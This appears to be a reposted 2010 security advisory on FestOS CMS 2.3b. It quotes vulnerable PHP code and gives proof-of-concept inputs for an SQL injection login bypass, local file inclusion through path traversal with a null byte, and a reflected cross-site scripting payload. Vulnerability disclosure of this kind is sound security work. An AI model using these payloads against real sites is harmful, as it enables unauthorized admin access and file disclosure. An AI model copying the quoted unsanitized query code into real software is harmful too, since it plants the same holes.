Home / os / win7

FestOS CMS 2.3b Multiple Remote Vulnerabilities

Posted on 09 September 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>FestOS CMS 2.3b Multiple Remote Vulnerabilities</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=============================================== FestOS CMS 2.3b Multiple Remote Vulnerabilities =============================================== Title : FestOS CMS 2.3b Multiple Remote Vulnerabilities Affected Version : &lt;=2.3b Vendor Site : http://festengine.org/ Discovery : abysssec.com Description : This CMS have many critical vulnerability that we refere to some of those here: Vulnerabilites : 1- SQL Injection Vulnerability : 1.1- in admin/do_login.php line 17: // Process the login $query = &quot;SELECT userid, roleID, username FROM &quot;.$config['dbprefix'].&quot;users WHERE LCASE(username) = '&quot;.strtolower($_POST['username']).&quot;' and password ='&quot;.md5($_POST['password']).&quot;'&quot;; $res = $festos-&gt;query($query); poc: in admin.php page: username: admin' or '1'='1 password: admin' or '1'='1 1.2- in festos_z_dologin.php: $query = &quot;SELECT vendorID FROM &quot;.$config['dbprefix'].&quot;vendors WHERE LCASE(email) = '&quot;.strtolower($_POST['email']).&quot;' and password ='&quot;.$_POST['password'].&quot;'&quot;; poc: in applications.php page: email: anything pass: a' or 1=1/* 2- Local File Inclusion (lfi): Vulnerability in index.php: line 41: if(isset($_GET['theme']) &amp;&amp; !empty($_GET['theme']) &amp;&amp; file_exists($config['ABSOLUTE_FILE_PATH'].'themes/'.$_GET['theme'])) { ... require_once($themepath.'/includes/header.php'); poc: http://localhost/festos/index.php?theme=../admin/css/admin.css%00 http://localhost/festos/artists.php?theme=../admin/css/admin.css%00 http://localhost/festos/contacts.php?theme=../admin/css/admin.css%00 http://localhost/festos/applications.php?theme=../admin/css/admin.css%00 http://localhost/festos/entertainers.php?theme=../admin/css/admin.css%00 http://localhost/festos/exhibitors.php?theme=../admin/css/admin.css%00 http://localhost/festos/foodvendors.php?theme=../admin/css/admin.css%00 http://localhost/festos/performanceschedule.php?theme=../admin/css/admin.css%00 http://localhost/festos/sponsors.php?theme=../admin/css/admin.css%00 http://localhost/festos/winners.php?theme=../admin/css/admin.css%00 3- Cross Site Scripting: in foodvendors.php, festos_foodvendors.php page has been included. lines 31-36. switch($switcher) { case 'details': if(!isset($_GET['vendorID']) || ctype_digit($_GET['vendorID'])===FALSE || $_GET['vendorID'] == '') { $template = 'foodvendors_nonespecified.tpl'; break; } and in line 74: $tpl-&gt;set('vType', $_GET['category']); and foodvendors_nonespecified.tpl line 123: &lt;p&gt;Back to the list of &lt;a href=&quot;&lt;?php echo $_SERVER['PHP_SELF'];?&gt;?view=list&amp;vTypeID=&lt;?php echo $vTypeID;?&gt;&quot; title=&quot;&lt;?php echo $vType;?&gt; Category&quot;&gt;exhibitors in the &lt;?php echo $vType;?&gt; category&lt;/a&gt;.&lt;/p&gt; the category parameter is vulnerable to xss: poc: http://localhost/festos/foodvendors.php?view=details&amp;vendorID=4&amp;category=%3Ciframe%20src=javascript:alert%28%22XSS%22%29;&amp;vTypeID=28 # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-09]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP